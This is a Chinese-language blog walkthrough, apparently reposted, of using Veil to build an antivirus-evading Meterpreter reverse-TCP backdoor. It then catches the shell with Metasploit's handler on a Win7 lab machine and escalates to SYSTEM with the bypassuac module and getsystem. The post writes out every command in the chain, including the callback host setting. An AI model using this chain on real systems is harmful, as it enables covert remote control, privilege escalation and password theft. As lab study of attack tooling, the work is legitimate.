免杀Payload生成工具Veil的下载与使用

Posted Goodric

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了免杀Payload生成工具Veil的下载与使用相关的知识,希望对你有一定的参考价值。

免杀Payload生成工具Veil的下载与使用

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件

————
————

下载Veil

kali 中输入指令 apt-get install veil 下载 veil(需要挺久)

下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。

我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。

重启服务之后我尝试输入 veil 看有没有装好,又让我确认是否安装。(前面执行了下载的指令难道只是在升级某些库)
输入 y 确定 (又需要挺久)

不停地下载,等过程结束,弹出这个,让我安装 python3,应该是下载veil必走过程,后面还有两个模块。

默认一直next

next

finish

然后弹出界面要求安装pywin32-218模块

默认下一步

下一步

结束

弹出界面提示需要安装pycrypto-2.6模块

下一步

next

上面的等待下载过了很久很久,包含但不仅限于上面几个东西,可能是我的kali有些问题,过程中安装了比较多的东西。
结束后输入 veil 回显如图,即安装成功。
可以看到, veil 自带两个 tools 。并且后面还给出了可用的命令:

exit ——退出veil
info ——工具信息
list —— 列出可用的工具
options —— 显示veil配置
update ——更新veil
use ——使用某个 tool

————
————

veil 生成免杀 payload

接下来就开始使用veil 生成免杀 payload
使用第一个tool:

use 1

看到装载了41个 payloads

list 可查看这 41个payload 分别是是什么。

这里尝试使用第7个:c/meterpreter/rev_tcp.py

use 7

给出了一些需要配置的选项,还有可用命令。

设置 LHOST为本地 kali 的IP:

set LHOST 192.168.43.125

options再次查看配置信息,可以看到 lhost 已经配置好了。lport端口默认4444,无需配置。

输入 generate 执行payload ,显示让我们 给命令中指定一个文件名:backup(自己设定)

可以看到生成了 可执行文件backup.exe

在文件中找到可执行文件: /var/lib/veil/output/compiled/backup.exe

我尝试把这个 exe 后门文件拿出来,但是在win10里马上就被查杀了,然后放进装了360的win7里也会被查杀。(貌似这免杀不够强啊)

————
————

使用 payload 进行渗透攻击

虽然生成的后门文件无法免杀,但这里还是结合 msf 测试一下进行攻击。
靶机:win7
打开 msf ,使用 handler模块

use exploit/multi/handler

也给出了 payload :generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

然后 options 查看配置项,设置 LHOST :

set LHOST 192.168.43.125

启动渗透攻击: exploit
然后我把那个后门文件 backup.exe 放在 win7靶机上,添加信任不被免杀,并运行 backup.exe ,然后回到kali ,就可以看到下图中所示信息, 打开了一个Meterpreter会话。

执行 shell 命令,可以看到进入了 win7 的命令行操作下,并看到win7用户名 Goodric 。

exit 退出命令行模式,getuid 查看当前权限为普通用户权限。要进行更深入的操作,还要进行提权。

————
————

结合 msf 的 bypassuac模块提权

这里测试用Metasploit中的bypassuac模块绕过UAC(用户访问控制),提升用户权限。
Metasploit的一些简单使用在之前写过:利用虚拟机复现漏洞 “永恒之蓝”

先把前面正在运行的handler模块放在后台:

background

回显提示在 session 1

也可以查看后台运行的会话:

sessions

使用bypassuac模块,并查看可配置的选项参数:

use exploit/windows/local/bypassuac

options
设置SESSION选项参数:

set session 1

exploit 启动渗透攻击
可以看到又进入了一个 meterpreter 会话。

getuid 查看当前权限为普通用户,getsystem 获取系统权限(最高权限),成功,再次 getuid 查看当前权限显示为 system 系统权限。
系统权限之后就可以进行各种操作了,获取密码等待。

以上是关于免杀Payload生成工具Veil的下载与使用的主要内容,如果未能解决你的问题,请参考以下文章

20155234 Exp3 免杀原理与实践

免杀后门之MSF&Veil-Evasion的完美结合

Exp3-免杀原理与实践

《网络对抗技术》——Exp3 免杀原理与实践

Windows免杀小结(工具篇)

20165218 《网络对抗技术》Exp3 免杀原理与实践